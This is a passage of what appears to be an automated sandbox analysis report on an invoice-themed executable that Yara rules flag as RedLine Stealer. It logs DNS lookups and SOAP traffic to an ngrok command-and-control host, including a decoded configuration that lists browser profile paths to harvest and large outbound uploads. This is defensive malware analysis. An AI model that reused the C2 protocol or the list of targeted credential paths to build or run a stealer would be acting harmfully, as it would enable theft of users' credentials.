May 27, 2022 19:28:21.276242971 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276261091 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276279926 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276300907 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276319981 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276338100 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276355982 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276374102 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276391983 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276412964 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276432991 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276452065 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276469946 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276501894 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276520014 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276539087 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276560068 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276582003 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276602030 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276619911 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276638031 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276655912 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276675940 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276695013 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276715040 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276734114 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276752949 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276773930 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276793957 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276813984 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276833057 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276850939 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276870966 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276878119 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.276891947 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276931047 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.295608044 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.295633078 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.295650005 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.295665979 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.295947075 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.296442032 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.296670914 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.296890974 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.304300070 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.324063063 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.616785049 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.636051893 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.636229038 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.655174017 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.655344963 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.656723976 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.674063921 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.674114943 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.674197912 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.674242973 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.675317049 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.675339937 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.675370932 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.675410032 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.675422907 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.677716970 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.692902088 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.692975044 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.693001032 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.693039894 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.693053961 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.693064928 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.693960905 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.693980932 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.693996906 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.694062948 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.694112062 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.695084095 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.696365118 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.696522951 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.711680889 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.711715937 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.711734056 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.711752892 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.711772919 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.711836100 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.711905003 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.712600946 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.712630987 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.712650061 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.712668896 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.712670088 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.712690115 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.713732004 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.715142965 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.715193033 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.715213060 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730451107 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730556011 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730560064 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.730592012 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730612993 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730628014 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.730637074 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730657101 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.730659008 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730680943 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730700016 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730721951 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730741024 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730760098 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730779886 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730799913 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730819941 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730840921 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.730859995 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.731235027 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.731256962 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.731275082 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.731296062 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.749488115 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.749510050 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.749537945 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.749556065 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.749573946 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.749593019 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.772028923 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.913635969 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:22.351895094 CEST	49744	17685	192.168.2.3	18.192.93.86

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2022 19:27:38.596059084 CEST	57723	53	192.168.2.3	8.8.8.8
May 27, 2022 19:27:38.617258072 CEST	53	57723	8.8.8.8	192.168.2.3
May 27, 2022 19:27:48.704843044 CEST	58116	53	192.168.2.3	8.8.8.8
May 27, 2022 19:27:48.779896021 CEST	57421	53	192.168.2.3	8.8.8.8
May 27, 2022 19:28:19.843580961 CEST	49873	53	192.168.2.3	8.8.8.8
May 27, 2022 19:28:19.865844011 CEST	53	49873	8.8.8.8	192.168.2.3
May 27, 2022 19:28:21.037759066 CEST	53802	53	192.168.2.3	8.8.8.8
May 27, 2022 19:28:21.056266069 CEST	53	53802	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 27, 2022 19:27:38.596059084 CEST	192.168.2.3	8.8.8.8	0xc313	Standard query (0)	2.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)
May 27, 2022 19:27:48.704843044 CEST	192.168.2.3	8.8.8.8	0x5322	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
May 27, 2022 19:27:48.779896021 CEST	192.168.2.3	8.8.8.8	0x1cf0	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
May 27, 2022 19:28:19.843580961 CEST	192.168.2.3	8.8.8.8	0x4cc2	Standard query (0)	2.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)
May 27, 2022 19:28:21.037759066 CEST	192.168.2.3	8.8.8.8	0xd269	Standard query (0)	2.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 27, 2022 19:27:38.617258072 CEST	8.8.8.8	192.168.2.3	0xc313	No error (0)	2.tcp.eu.ngrok.io		18.197.239.5	A (IP address)	IN (0x0001)
May 27, 2022 19:27:48.729235888 CEST	8.8.8.8	192.168.2.3	0x5322	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
May 27, 2022 19:27:48.804045916 CEST	8.8.8.8	192.168.2.3	0x1cf0	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
May 27, 2022 19:28:19.865844011 CEST	8.8.8.8	192.168.2.3	0x4cc2	No error (0)	2.tcp.eu.ngrok.io		18.192.93.86	A (IP address)	IN (0x0001)
May 27, 2022 19:28:21.056266069 CEST	8.8.8.8	192.168.2.3	0xd269	No error (0)	2.tcp.eu.ngrok.io		18.192.93.86	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

2.tcp.eu.ngrok.io:17685

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49729	18.197.239.5	17685	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Timestamp	kBytes transferred	Direction	Data
May 27, 2022 19:27:39.375066042 CEST	397	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 2.tcp.eu.ngrok.io:17685 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
May 27, 2022 19:27:39.402753115 CEST	398	IN	HTTP/1.1 100 Continue
May 27, 2022 19:27:39.431945086 CEST	398	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 27 May 2022 17:27:39 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
May 27, 2022 19:27:48.029419899 CEST	543	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 2.tcp.eu.ngrok.io:17685 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
May 27, 2022 19:27:48.057007074 CEST	543	IN	HTTP/1.1 100 Continue
May 27, 2022 19:27:48.097670078 CEST	545	IN	HTTP/1.1 200 OK Content-Length: 4889 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 27 May 2022 17:27:48 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 2e 52 55 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 52 55 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 2f 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>.RU</b:string><b:string>RU</b:string></a:BlockedCountry><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7S

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49741	18.192.93.86	17685	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Timestamp	kBytes transferred	Direction	Data
May 27, 2022 19:28:19.890335083 CEST	661	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 2.tcp.eu.ngrok.io:17685 Content-Length: 1156830 Expect: 100-continue Accept-Encoding: gzip, deflate
May 27, 2022 19:28:19.918385029 CEST	661	IN	HTTP/1.1 100 Continue
May 27, 2022 19:28:21.024976969 CEST	2012	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 27 May 2022 17:28:21 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49744	18.192.93.86	17685	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Timestamp	kBytes transferred	Direction	Data
May 27, 2022 19:28:21.081269026 CEST	2078	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 2.tcp.eu.ngrok.io:17685 Content-Length: 1156822 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
May 27, 2022 19:28:21.109380007 CEST	2078	IN	HTTP/1.1 100 Continue
May 27, 2022 19:28:21.772028923 CEST	3569	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 27 May 2022 17:28:21 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	19:26:57
Start date:	27/05/2022
Path:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe"
Imagebase:	0x450000
File size:	241664 bytes
MD5 hash:	6FFB271DAC5AEA05D5A8FEB1344AC144
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.549326189.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.549326189.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.272367102.0000000000ADB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.272367102.0000000000ADB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Target ID:	1
Start time:	19:26:59
Start date:	27/05/2022
Path:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
Imagebase:	0xb00000
File size:	241664 bytes
MD5 hash:	6FFB271DAC5AEA05D5A8FEB1344AC144
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.450292993.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.450292993.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.454537035.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.276963051.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: 